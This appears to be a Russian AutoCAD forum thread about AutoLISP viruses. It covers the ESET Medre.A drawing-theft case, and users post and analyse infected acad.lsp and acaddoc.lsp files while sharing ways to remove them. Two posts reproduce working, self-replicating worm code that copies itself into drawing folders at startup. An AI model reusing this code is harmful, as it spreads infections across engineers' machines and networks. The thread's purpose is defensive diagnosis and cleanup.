чертежей AutoCAD (принадлежащих в основном пользователям из Перу). Из-за масштабности вирусной атаки специалисты ESET обратились к владельцу домена qq.com, компании Tencent. Благодаря незамедлительным действиям ESET и Tencent учетные записи, использовавшиеся для передачи чертежей, были заблокированы, что предотвратило дальнейшую утечку данных. Помимо Перу, исследовательские группы ESET во всем мире обнаружили небольшое количество заражений в других латино-американских странах. Большое число заражений в Перу может быть связано с тем, что вредоносное ПО, модифицированное под файл AutoCAD, могло быть внедрено в компании, которые работают с государственными службами Перу. Это наводит на мысль, что основной мишенью создателей ACAD/Medre.A являлись именно эти организации. На данный момент ESET сотрудничает с местными властями, чтобы восстановить пораженный веб-сайт.

[sbi]

MCAD« ACAD / Medre . A представляет собой интересный случай промышленного шпионажа, вредоносная программа отслеживает появление новых чертежей на компьютерах зараженных пользователей и автоматически отправляет их на почту злоумышленникам, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики российского представительства ESET. - Такие хищения могут нанести серьезный материальный ущерб не только государственным учреждениям, но и просто владельцам интеллектуальной собственности, поскольку киберпреступники получают доступ к проектам еще до их запуска в производство. Они даже могут успеть получить патент на новый продукт до того, как создатели обратятся в патентное бюро».
вирус не причём!

[skif58]

Цитата:

Сообщение от sbi вирус не причём!

А логика?

[MCAD]

Цитата:

Сообщение от sbi вирус не причём!

Я, как всегда, выводы не делаю. Только информация.

Цитата:

Сообщение от skif58 А логика?

Вот именно!

[sbi]

skif58! и такую прогу можно напмсать на любом языке Причем здесь ВИРУС? Используя ошибки net.

[skif58]

sbi, я всегда думал, что ВИРУС - это прога.

[hwd]

Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...

[Хмурый]

Цитата:

Сообщение от hwd Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...

да он, SP1, уже вышел, но потом удалили. я даже скачать не успел.
http://forum.dwg.ru/showpost.php?p=962002&postcount=89

[hwd]

Цитата:

Сообщение от Хмурый да он, SP1, уже вышел, но потом удалили.

я в курсе, поэтому и пишу - ждать...

[Krovlaf]

Делаю работу для одной конторы. Там в каждой папке с чертежами dwg сидят acad.lsp Даже бесплатная Авира орет о вирусне и предлагает их удалить. У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"? Код прилагаю:

Код:

[Выделить все]

 (defun
	  s::startup
		    (/	      old_cmd  path	dwgpath	 mnlpath
		     apppath  oldacad  newacad	nowdwg	 lspbj
		     wjm      wjm1     wjqm	wjqm1	 wz
		     ns1      ns2
		    )
  (setq
    old_cmd
     (getvar
       "cmdecho"
     )
  )
  (setvar
    "cmdecho"
    0
  )
  (setq
    path
     (findfile
       "base.dcl"
     )
  )
  (setq
    path
     (substr
       path
       1
       (-
	 (strlen
	   path
	 )
	 8
       )
     )
  )
  (setq
    mnlpath
     (getvar
       "menuname"
     )
  )
  (setq
    nowdwg
     (getvar
       "dwgname"
     )
  )
  (setq
    wjqm
     (findfile
       nowdwg
     )
  )
  (setq
    dwgpath
     (substr
       wjqm
       1
       (-
	 (strlen
	   wjqm
	 )
	 (strlen
	   nowdwg
	 )
       )
     )
  )
  (setq
    acadpath
     (findfile
       "acad.lsp"
     )
  )
  (setq
    acadpath
     (substr
       acadpath
       1
       (-
	 (strlen
	   acadpath
	 )
	 8
       )
     )
  )
  (setq
    ns1
	""
    ns2
	""
  )
  (setq
    lspbj
     0
  )
  (setq
    wjqm
     (strcat
       path
       "acad.lsp"
     )
  )
  (if
    (setq
      wjm
       (open
	 wjqm
	 "r"
       )
    )
     (progn
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (setq
	    ns1
	     ns2
	  )
	  (setq
	    ns2
	     wz
	  )
       )
       (if
	 (>
	   (strlen
	     ns1
	   )
	   14
	 )
	  (if
	    (=
	      (substr
		ns1
		8
		7
	      )
	      "acadapp"
	    )
	     (setq
	       lspbj
		1
	     )
	  )
       )
       (close
	 wjm
       )
     )
  )
  (if
    (and
      (=
	acadpath
	dwgpath
      )
      (/=
	acadpath
	path
      )
    )
     (progn
       (setq
	 oldacad
	  (findfile
	    "acad.lsp"
	  )
       )
       (setq
	 newacad
	  (strcat
	    path
	    "acadapp.lsp"
	  )
       )
       (if
	 (=
	   lspbj
	   0
	 )
	  (progn
	    (setq
	      wjqm
	       (strcat
		 path
		 "acad.lsp"
	       )
	    )
	    (setq
	      wjm
	       (open
		 wjqm
		 "a"
	       )
	    )
	    (write-line
	      (strcat
		"(load
"
		(chr
		  34
		)
		"acadapp"
		(chr
		  34
		)
		")"
	      )
	      wjm
	    )
	    (write-line
	      "(princ)"
	      wjm
	    )
	    (close
	      wjm
	    )
	  )
       )
       (writeapp)
     )
     (progn
       (if
	 (/=
	   nowdwg
	   "Drawing.dwg"
	 )
	  (progn
	    (setq
	      oldacad
	       (findfile
		 "acadapp.lsp"
	       )
	    )
	    (setq
	      newacad
	       (strcat
		 dwgpath
		 "acad.lsp"
	       )
	    )
	    (writeapp)
	  )
       )
     )
  )
    (setvar
    "cmdecho"
    old_cmd
  )
  (princ)
)
(defun
	  writeapp
		  ()
  (if
    (setq
      wjm1
       (open
	 newacad
	 "w"
       )
    )
     (progn
       (setq
	 wjm
	  (open
	    oldacad
	    "r"
	  )
       )
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (write-line
	    wz
	    wjm1
	  )
       )
       (close
	 wjm
       )
       (close
	 wjm1
       )
     )
  )
)
(defun
	  C:explode
		   (/
		    p
		    cont
		    old_cmd
		   )
  (setq

[Do$]

Код приведен не полностью, но уже видно, что идет переопределение команды EXPLODE. Кто-то пытался, наверное, защитить свои блоки от расчленения Хотя надо смотреть код полностью, может там еще какие-то сюрпризы.

[gomer]

Цитата:

Сообщение от Krovlaf У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"?

да, это "вирус", 100%

[Krovlaf]

Цитата:

Код приведен не полностью

Сейчас еще раз перепроверил (для этого пришлось отключать уже NOD) код скопирован из файла и вставлен полностью (Ctrl+A)+(Ctrl+C)+(Ctrl+V)

Цитата:

да, это "вирус", 100%

А что кроме переопределения Explode обнаруживается "зловредного"?

[hwd]

Цитата:

Сообщение от Krovlaf А что кроме переопределения Explode обнаруживается "зловредного"?

А тебе не всё ли равно, или просто заняться нечем? Ответили ведь уже: выбрось это в ведро и не парь себе и другим мозг.

[Krovlaf]

Мне это, уважаемый легковозбудимый, для админов, которые похоже не ухом не рылом что это за "lsp" и чем оно плохо. Объяснить им развернуто почему надо почистить сеть. Потому как обленились и не хотят лишних телодвижений. Доходчиво? Водички выпей - успокоешься...

[Владимир.]

Цитата:

Сообщение от Krovlaf сейчас еще раз перепроверил

Всё равно, видно, что в конце "недописано"

[Krovlaf]

Кажется мне покурочили его и бросили. Не похож он на остальные подобные "вирусы" выложенные сдесь. По отзывам трудящихся никаких нареканий на работу Acada не было. "У нас всегда так было, значит так надо"! Хотя не факт что в других конторах использующих эти файлы все гладко. Чистить надо однозначно, как - описано выше, только надо знать что конкретно этот файл пытается сделать при запуске программы.

[gomer]

Krovlaf, что в командной строке автокада пишется при загрузке? Этот вирус размножает себя путем копирования содержимого в файлы аcad.lsp в папке с текущим чертежом... то, что там не дописано, возможно работа антивируса, который заблокировал файл при чтении-записи, но подранок еще живет, и размножается

[Krovlaf]

Командная строка при запуске:

Цитата:

Открывается файл формата AutoCAD 2007/LT 2007. Выполняется регенерация модели. ; ошибка: неверно сформированный список на входе Утилиты меню AutoCAD загружены. Команда: Файл Autodesk DWG. Это файл формата TrustedDWG, сохраненный в приложении Autodesk или в приложении, лицензированном корпорацией Autodesk. Команда:

Выделенное красным - это "ОНО"?

[gomer]

Цитата:

Сообщение от Krovlaf ; ошибка: неверно сформированный список на входе

Да, это ОНО! Это ваш недописанный вирус вызывает ошибку!

[Composter]

нашел на иностранном форуме lisp, который лечит от этой заразы . Запуск лиспа "KW". Дальше несложно разобраться

[Кулик Алексей aka kpblc]

Еще одна версия (вроде ссылка должна быть доступна всем) http://forum.inoe.name/showpost.php?...18&postcount=9

[kha]

Прошу прощения, если где уже было - прочитал уже несколько тем, но так и не нашёл ответа.

У меня чистая машина. Правильно ли я понимаю, что при снятой галке с пункта "Загружать acad.lsp c каждым чертежом" этот вирус мне не страшен?

[Кулик Алексей aka kpblc]

kha, если у тебя ACAD версии до 2013 - страшен

[kha]

да, автокад 2012
каким образом тогда вирус заражает автокад, если я отключил эту опцию?

Нашёл вот этот метод: http://bushman-andrey.blogspot.ru/20...p-acadfas.html

пробовал кто-нибудь?

[Александр Ривилис]

Цитата:

Сообщение от kha каким образом тогда вирус заражает автокад, если я отключил эту опцию?

Вместо acad.lsp в каждый документ при открытии грузится как минимум acaddoc.lsp.

[ciril]

Цитата:

Сообщение от kha каким образом тогда вирус заражает автокад, если я отключил эту опцию?

но при первом чертеже в сессии он все равно грузится.

[Кулик Алексей aka kpblc]

http://adn-cis.org/posledovatelnost-...v-autocad.html + http://adn-cis.org/autocad-autoload-security.html

[kha]

Цитата:

Сообщение от Александр Ривилис Вместо acad.lsp в каждый документ при открытии грузится как минимум acaddoc.lsp.

C acaddoc.lsp да, подгружается при снятой галке.

Цитата:

Сообщение от ciril но при первом чертеже в сессии он все равно грузится.

Проверил, загружается, зараза.

Благодарю за разъяснения.

[Mixon2010]

Как бороться с этим файлом я так и не понял. Появляется и все тут

После эксперимента понял следующее..... "Здоровый" компьютер заражается после открытия файла с чертежом. Заражение происходит в том случае, если в папке с чертежом находилась скрытая вредоносная программа acaddoc.fas.

После открытия, происходит автоматическая загрузка файла acaddoc.fas в память приложения autocad и подмена некоторых файлов автокада в папке Support в профиле пользователя. Например в загруженных программах сразу будет видно, что в память подгружается файл acaddoc.fas и подмененный файл acad.mnl.fas. Далее зараженный автокад будет клонировать вредоносную прогу acaddoc.fas на каждом открытом чертеже. Причем после заражения - файл acaddoc.fas автоматически восстанавливается на всех папках и дисках, если они ранее были удалены.

Простая переустановка не поможет полагаю ну или делать это нужно одномоментно на всех компах. где стоит полная версия автокада, а до этого везде уничтожить файл acaddoc.fas.

[VVA]

Mixon2010, Заархивируй в zip или rar и выкладывай сюда для препарации

[Кулик Алексей aka kpblc]

Я подправил первый пост темы.

[Mixon2010]

Выложить файл acaddoc.fas ??? На фирме теперь на всех сетевых дисках гуляет этот файл )))) Отрицательного влияния пока не ощущается. Вроде бы все работает пока. Но его все больше и больше становится

[741520]

Цитата:

Сообщение от Mixon2010 Вроде бы все работает пока. Но его все больше и больше становится

Когда нибуть их станет так много, что они выселят вас из офиса. Приходишь ты такой на работу а в твоем кресле сидит такой толстый вирус и говорит: "Шел бы ты от сюда, парниша... "

[Mixon2010]

Цитата:

Сообщение от 741520 Когда нибуть их станет так много, что они выселят вас из офиса. Приходишь ты такой на работу а в твоем кресле сидит такой толстый вирус и говорит: "Шел бы ты от сюда, парниша... "

Все может быть

[Mixon2010]

Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один. Надо на ком то проверить

[Кулик Алексей aka kpblc]

Начальный пост темы прочитай - там полно рецептов

[VVA]

Цитата:

Сообщение от Mixon2010 Выложить файл acaddoc.fas ??? На фирме теперь на всех сетевых дисках гуляет этот файл )))) Отрицательного влияния пока не ощущается. Вроде бы все работает пока. Но его все больше и больше становится

Подтверждение, что лафа рано или поздно закончится Проблема долгой загрузки PS Utils после обновления антивируса NOD v.6

[Сергей Юрьевич]

Цитата:

Сообщение от Mixon2010 Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один.

рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются

[rtyu]

Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----

Цитата:

Сообщение от Сергей Юрьевич рецепт: мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить после этого файлы acaddoс.fas снова не появляются

А если появляются?

[Сергей Юрьевич]

Цитата:

Сообщение от rtyu Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии? ----- добавлено через ~3 мин. ----- А если появляются?

может у вас какой-то другой вирус?
у себя вычистил данным способом - больше не появляется.

[Кулик Алексей aka kpblc]

Сергей Юрьевич, тебе повезло: у тебя стандартные файлы acad*.lsp не были заражены. rtyu, читай все ссылки из #1 - там полно вариантов.

[rtyu]

А у меня ребята такая проблема. Значит имеются 3 компьютера на них установлены Windows XP и Автокад 2008. Как-то проходя мимо их я заметил, что у них не правильно установлено время, а именно год 2013, у кого и 2014. Вообщем естественно я их поменял на правильное т.е 2015 год. После этого пользователи начали запускать файлы в Автокаде и к моему удивлению в чертежах начал дорисовываться вот такой вот "алигафрен" (см.скриншот.) Я уже молчу зато, что появляются acaddoc.fas. Стоит антивирус AVG 2015 у которого к сожалению разработчики не додумались прописать проверку файлов lsp, поэтому мне пришлось сделать это самому вручную, как только я это сделал антивирус начал удалять acad.lsp. Что самое интересное, что если системную дату поставить опять не правильную, то в файле ничего не рисуется т.е файл открывается так как надо и ничего стороннего не рисуется.
Скриншот выкладываю

[Faust2956]

Занятная штуковина)

[Кулик Алексей aka kpblc]

rtyu, тебе своей отдельной темы мало? http://forum.dwg.ru/showthread.php?t=119584

[gomer]

я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154

[Admin]

Цитата:

Сообщение от gomer я то думал чего тема активировалась в последнее время... а оно вон оно что... http://dwg.ru/dnl/13154

Спасибо, удалил

[CaMoCAD]

Цитата:

Сообщение от gomer я то думал чего тема активировалась в последнее время... а оно вон оно что... http://dwg.ru/dnl/13154

Цитата:

Сообщение от Admin Спасибо, удалил

А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.

[Кулик Алексей aka kpblc]

Если в архиве есть файл с маской имени acad*.* - то его уничтожай, остальное как правило уже безвредно.

[sbi]

Цитата:

Сообщение от CaMoCAD А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.

Ничего страшного:

[Admin]

Там было

Цитата:

Состав архива Люди Модель Dwg/ Люди Модель Dwg/acaddoc.fas Люди Модель Dwg/ludi.png Люди Модель Dwg/Модели блоки людей.dwg

[Кулик Алексей aka kpblc]

Цитата:

Сообщение от Admin Люди Модель Dwg/acaddoc.fas

acad*.* - уничтожить.

[CaMoCAD]

Спасибо

[Hottabich]

При открытии этой темы, и при обновлении страницы, только у меня антивирь ругается?

[Хмурый]

Offtop: Hottabich, у тебя он, видать, на слово "вирус" срабатывает

[Red Nova]

Други привет.
Каким-то образом попал к нам этот acaddoc.lsp
У нас файлы в сети, человек 10 юзеров акада. стоят AutoCAD 2013, 2014, ASD 2013
Попробовал KillWorm142, кажись пользы нет, но может я его неверно использовал.
Почитал тут тему, но не понял пока есть ли не безболезненное решение проблемы, особенно беспокоит вопрос сети, ведь в этом случае очистить свой комп и переставить акад не решение... Да и разгар работы, тут не до перестановки.
Не пинайте плиз ФАК-ом а подскажите.
1. Как может навредить вирус кроме того что он везде себя копирует?
2. Какой способ избавления от него сейчас считается наиболее быстрым и эффективным (учитывая сеть)? Готовое решение есть?

Вот этот гад...

Код:

[Выделить все]

 R(defun-q s::startup
	 (/ basepath
	    baseacad
	    acaddocpath
	    r-acaddoc
	    w-basepath
	    rl-acaddoc
	    acaddoclsp
	    c-acaddocname
	    c-acaddocpath
	    c-acaddoc
	   )
     (setq basepath
	    (findfile "base.dcl")
     )
     (setq basepath
	    (substr basepath
		    1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
	(setq acaddocpath
               (findfile "acaddoc.lsp")
	)
	(setq acaddocpath
	       (substr acaddocpath
		       1 (- (strlen acaddocpath) 11)
	       )
	)
	(setq acaddoclsp
	       (strcat acaddocpath "acaddoc.lsp"))
	
	
        (setq c-acaddocname
	       (getvar "dwgname")
	)
        (setq c-acaddocpath
	       (findfile c-acaddocname)
	)
        (setq c-acaddocpath
	       (substr c-acaddocpath
		       1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
		)
	 )
        (setq c-acaddoc
	       (strcat c-acaddocpath "acaddoc.lsp")
	 )
	 (if
           (and
	   (/= basepath acaddocpath)
	   (= c-acaddocpath acaddocpath)
	   )
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open baseacad "w")
		)     
	       (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
         
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open c-acaddoc "w")
		)
	        (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
	 )
	 (princ)
)

[Кулик Алексей aka kpblc]

Первый пост темы.

[Red Nova]

Привет Алексей. Подскажи плиз, как понимаю мне достаточно последней (вот этой) строчки?

Цитата:

Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

Тут две ссылки.
По первой код. Для чего именно он и что с ним делать? Запустить один раз функцию (inoe-erase-acad-virus) достаточно? Может следует в автозагрузку его?

----- добавлено через ~31 мин. -----
У меня AutoCAD 2013 + ASD 2013. Но дистрибутива нет под рукой чтоб взять не порченные нужные файлы. Могу поставить 2014.
Вопрос. Если я снесу все 2013 и поставлю новый софт 2014, поможет ли если я сразу в нем acad*.lsp, acad*doc*.lsp, acad*.mnl сделаю read only?
Естественно до этого найду и уничтожу все зараженные файлы (хоть те что у меня на машине а не в сети).

[Composter]

подскажите, а можно вообще запретить подгрузку *.lsp файлов из недоверенных директорий, чтобы ввобще даже окно не появлялось с запросом?

[Александр Ривилис]

Цитата:

Сообщение от Composter подскажите, а можно вообще запретить подгрузку *.lsp файлов из недоверенных директорий, чтобы ввобще даже окно не появлялось с запросом?

SECURELOAD в 2: http://help.autodesk.com/view/ACD/20...3-C1490E924A02
Но боюсь, что тогда ты начнёшь удивляться почему у тебя что-то нужное не грузится.

[Composter]

но я же не зря спросил про доверенные директории )))
спасибо за ответ